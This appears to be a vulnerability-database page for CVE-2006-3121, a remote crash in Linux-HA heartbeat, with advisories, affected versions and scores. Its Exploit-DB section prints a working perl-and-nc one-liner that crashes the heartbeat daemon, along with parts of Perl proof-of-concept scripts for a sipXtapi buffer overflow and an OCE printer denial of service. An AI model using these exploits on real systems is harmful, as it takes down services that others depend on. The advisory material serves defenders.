CVE-2006-3121
published 2006-08-17CVE-2006-3121: The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High-Availability Linux before 1.2.5, and 2.0 before 2.0.7, allows remote attackers…
PriorityP424medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
12.59%
95.7th percentile
The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High-Availability Linux before 1.2.5, and 2.0 before 2.0.7, allows remote attackers to cause a denial of service (crash) via the length parameter in a heartbeat message.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | heartbeat | < heartbeat 1.2.4-14 (bookworm) | heartbeat 1.2.4-14 (bookworm) |
| heartbeat | heartbeat | >= 0 < 1.2.4-14 | 1.2.4-14 |
| heartbeat | heartbeat | >= 0 < 1.2.4-14 | 1.2.4-14 |
| heartbeat | heartbeat | >= 0 < 1.2.4-14 | 1.2.4-14 |
| heartbeat | heartbeat | >= 0 < 1.2.4-14 | 1.2.4-14 |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| linux-ha | heartbeat | <= 1.2.4 | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
osv5.0MEDIUM
vendor_debian5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qj99-gqqj-q94c: The peel_netstring function in cl_netstring
ghsa_unreviewed·2022-05-01
CVE-2006-3121 [MEDIUM] GHSA-qj99-gqqj-q94c: The peel_netstring function in cl_netstring
The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High-Availability Linux before 1.2.5, and 2.0 before 2.0.7, allows remote attackers to cause a denial of service (crash) via the length parameter in a heartbeat message.
GHSA
GHSA-fc9v-f38v-7g92: XHA (Linux-HA) on the BlueCat Networks Adonis DNS/DHCP Appliance 5
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2007-4205 [MEDIUM] GHSA-fc9v-f38v-7g92: XHA (Linux-HA) on the BlueCat Networks Adonis DNS/DHCP Appliance 5
XHA (Linux-HA) on the BlueCat Networks Adonis DNS/DHCP Appliance 5.0.2.8 allows remote attackers to cause a denial of service (heartbeat control process crash) via a UDP packet to port 694. NOTE: this may be the same as CVE-2006-3121.
OSV
CVE-2006-3121: The peel_netstring function in cl_netstring
osv·2006-08-17·CVSS 5.0
CVE-2006-3121 [MEDIUM] CVE-2006-3121: The peel_netstring function in cl_netstring
The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High-Availability Linux before 1.2.5, and 2.0 before 2.0.7, allows remote attackers to cause a denial of service (crash) via the length parameter in a heartbeat message.
Ubuntu
heartbeat vulnerability
vendor_ubuntu·2006-08-16
CVE-2006-3121 heartbeat vulnerability
Title: heartbeat vulnerability
Summary: heartbeat vulnerability
Yan Rong Ge discovered that heartbeat did not sufficiently verify some
packet input data, which could lead to an out-of-boundary memory
access. A remote attacker could exploit this to crash the daemon
(Denial of Service).
Instructions: In general, a standard system upgrade is sufficient to effect the
necessary changes.
Debian
CVE-2006-3121: heartbeat - The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High...
vendor_debian·2006·CVSS 5.0
CVE-2006-3121 [MEDIUM] CVE-2006-3121: heartbeat - The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High...
The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High-Availability Linux before 1.2.5, and 2.0 before 2.0.7, allows remote attackers to cause a denial of service (crash) via the length parameter in a heartbeat message.
Scope: local
bookworm: resolved (fixed in 1.2.4-14)
bullseye: resolved (fixed in 1.2.4-14)
forky: resolved (fixed in 1.2.4-14)
sid: resolved (fixed in 1.2.4-14)
trixie: resolved (fixed in 1.2.4-14)
No detection rules found.
Exploit-DB
Linux-HA Heartbeat 2.0.6 - Remote Denial of Service
exploitdb·2006-08-13
CVE-2006-3121 Linux-HA Heartbeat 2.0.6 - Remote Denial of Service
Linux-HA Heartbeat 2.0.6 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/19516/info
Linux-HA Heartbeat is prone to a remote denial-of-service vulnerability.
By successfully exploiting this issue, attackers can crash the master control process. This may result in the failure of services that depend on the application's functionality.
perl -e 'print "###\n2147483647heart attack:%%%\n"' | nc -u 192.168.1.12 694
Exploit-DB
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
exploitdb·2006-07-10
CVE-2006-3524 SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
# PoC Exploit By [email protected]
# Remote Buffer Overflow in sipXtapi
use IO::Socket;
#use strict;
print "sipXtapi Exploit by Michael Thumann \n\n";
if (not $ARGV[0]) {
print "Usage: sipx.pl \n";
exit;}
$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: \r
\r
END
print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target)
Exploit-DB
OCE 3121/3122 Printer - 'parser.exe' Denial of Service
exploitdb·2006-04-26
CVE-2006-2108 OCE 3121/3122 Printer - 'parser.exe' Denial of Service
OCE 3121/3122 Printer - 'parser.exe' Denial of Service
---
#!/usr/bin/perl
#
#OCE 3121/3122 Printer DoS Exploit
#----------------------------
#By Herman Groeneveld aka sh4d0wman
#trancelover75 [AT] gmail.com
#
#Description: the printer runs a webserver to provide various printing tasks from
#java enabled browsers. Input is being filtered for bad characters.
#However it is vulnerable to a long url request. This will either reboot or crash the device.
#
#On crash, the "system" led on the printer changes from green to orange. No further printing is done
#until somebody resets the printer by flipping the powerswitch. E675 error displayed in printer display.
#On reboot, printing resumes after the device has completed it's reboot cycle.
#
#Crash is hard to accomplish. Play with the buffer inpu
No writeups or analysis indexed.
http://secunia.com/advisories/21505http://secunia.com/advisories/21511http://secunia.com/advisories/21518http://secunia.com/advisories/21521http://secunia.com/advisories/21629http://security.gentoo.org/glsa/glsa-200608-23.xmlhttp://www.debian.org/security/2006/dsa-1151http://www.linux-ha.org/SecurityIssueshttp://www.linux-ha.org/_cache/SecurityIssues__sec03.txthttp://www.mandriva.com/security/advisories?name=MDKSA-2006:142http://www.securityfocus.com/bid/19516http://www.ubuntu.com/usn/usn-335-1http://www.vupen.com/english/advisories/2006/3288https://exchange.xforce.ibmcloud.com/vulnerabilities/28396http://secunia.com/advisories/21505http://secunia.com/advisories/21511http://secunia.com/advisories/21518http://secunia.com/advisories/21521http://secunia.com/advisories/21629http://security.gentoo.org/glsa/glsa-200608-23.xmlhttp://www.debian.org/security/2006/dsa-1151http://www.linux-ha.org/SecurityIssueshttp://www.linux-ha.org/_cache/SecurityIssues__sec03.txthttp://www.mandriva.com/security/advisories?name=MDKSA-2006:142http://www.securityfocus.com/bid/19516http://www.ubuntu.com/usn/usn-335-1http://www.vupen.com/english/advisories/2006/3288https://exchange.xforce.ibmcloud.com/vulnerabilities/28396
2006-08-17
Published